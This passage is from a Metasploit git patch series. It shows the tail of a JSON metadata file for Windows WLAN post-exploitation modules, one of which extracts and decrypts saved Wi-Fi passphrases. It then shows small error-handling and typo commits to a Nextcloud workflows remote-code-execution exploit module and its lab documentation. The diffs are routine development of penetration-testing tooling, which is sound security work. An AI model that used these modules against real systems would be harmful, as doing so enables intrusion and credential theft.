"/modules/post/windows/wlan/wlan_bss_list.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_bss_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_current_connection": { + "name": "Windows Gather Wireless Current Connection Info", + "fullname": "post/windows/wlan/wlan_current_connection", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/wlan/wlan_current_connection.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_current_connection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_disconnect": { + "name": "Windows Disconnect Wireless Connection", + "fullname": "post/windows/wlan/wlan_disconnect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module disconnects the current wireless network connection\n on the specified interface.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/wlan/wlan_disconnect.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_disconnect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_probe_request": { + "name": "Windows Send Probe Request Packets", + "fullname": "post/windows/wlan/wlan_probe_request", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/wlan/wlan_probe_request.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_probe_request", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_profile": { + "name": "Windows Gather Wireless Profile", + "fullname": "post/windows/wlan/wlan_profile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/wlan/wlan_profile.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_profile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + } +} \ No newline at end of file From 2259de33c169969116bd287273aa6694cf54f840 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Wed, 14 May 2025 13:40:47 +0000 Subject: [PATCH 22/27] Fixed a txpo in nextcloud_workflows_rce.md --- .../modules/exploit/unix/webapp/nextcloud_workflows_rce.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md index 6beb988b28bff..66be630c29823 100644 --- a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md +++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md @@ -76,7 +76,7 @@ Before we can run the exploit, we need to start the cronjob. This is crucial bec payload doesn't get triggered: ``` -docker exec -it -u www-data nextcloud-app-1 /bin/bash` +docker exec -it -u www-data nextcloud-app-1 /bin/bash watch -n2 php cron.php ``` From 0e0b84d2524fadd67d185dc48b255f4885e241e4 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Wed, 14 May 2025 13:53:59 +0000 Subject: [PATCH 23/27] Error message if nextcloud-upload fails --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 6569f8f4a42fb..c8b12d74fb36e 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -146,11 +146,12 @@ def create_workflow(operation) end def upload_file(filename) - send_request_cgi( + res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, "remote.php/webdav/#{filename}"), 'method' => 'PUT', 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } ) + fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res.message == 'Created' end def delete_workflow(workflow_id) From 9b619cbc58d9b3392284dd2461f2c9cc1de000c4 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 11:12:05 +0200 Subject: [PATCH 24/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index c8b12d74fb36e..dd53e6c5b6f1d 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -86,7 +86,7 @@ def authenticate(user, pass) 'method' => 'GET', 'keep_cookies' => true ) - +fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = parse_token(res) fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil? From 72c9d5b038069ab7a85901ff0ee58926fa00c0b2 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 11:14:25 +0200 Subject: [PATCH 25/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index dd53e6c5b6f1d..ee49ddcfb65a8 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -108,7 +108,7 @@ def request_token 'method' => 'GET', 'keep_cookies' => true ) - +fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = res.get_json_document['token'] fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil? end From 61dc956bb3b28febb063d68af330a0566a2440c0 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 11:15:05 +0200 Subject: [PATCH 26/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index ee49ddcfb65a8..e926ad675f6c9 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -151,7 +151,7 @@ def upload_file(filename) 'method' => 'PUT', 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } ) - fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res.message == 'Created' + fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res&.message == 'Created' end def delete_workflow(workflow_id) From 97ecaa7c309ae1cb8ee60c48966dd805beb3b215 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 09:16:26 +0000 Subject: [PATCH 27/27] Refactoring indentations --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index e926ad675f6c9..ac96580ed0aa1 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -86,7 +86,7 @@ def authenticate(user, pass) 'method' => 'GET', 'keep_cookies' => true ) -fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 + fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = parse_token(res) fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil? @@ -108,7 +108,7 @@ def request_token 'method' => 'GET', 'keep_cookies' => true ) -fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 + fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = res.get_json_document['token'] fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil? end